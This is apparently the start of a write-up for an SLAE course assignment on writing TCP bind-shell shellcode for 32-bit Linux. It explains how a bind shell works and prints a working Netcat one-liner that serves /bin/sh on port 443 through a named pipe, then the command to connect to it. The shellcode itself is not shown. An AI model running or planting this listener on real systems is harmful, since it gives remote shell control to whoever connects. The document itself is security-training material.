Assignment Goals (SLAE-1530)
1) Create a TCP Bindshell Shellcode for Linux x86-32.
2) The port number should be easily configurable.
3) Bonus if getting referenced in exploit-db or shell-storm.
TCP Bindshell Principle
In few words, a TCP Bindshell is a tiny server program that waits for new clients on a specific port.
When a new client connects to the server it will spawn a new shell (Ex: /bin/bash
or /bin/sh
) and "binds" its file descriptors stdin
(0) stdout
(1) stderr
(2) to the new client socket.
Yes, a socket is nothing more than a file.
One infamous method to easily create a bindshell is to use Netcat
as following:
root@local:# mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc -lvp 443 1>/tmp/backpipe
When you connect to port 443
(with any dumb client program ex: Netcat
, Telnet
) you will get remote control over shell instance.
user@local:$ nc 127.0.0.1 443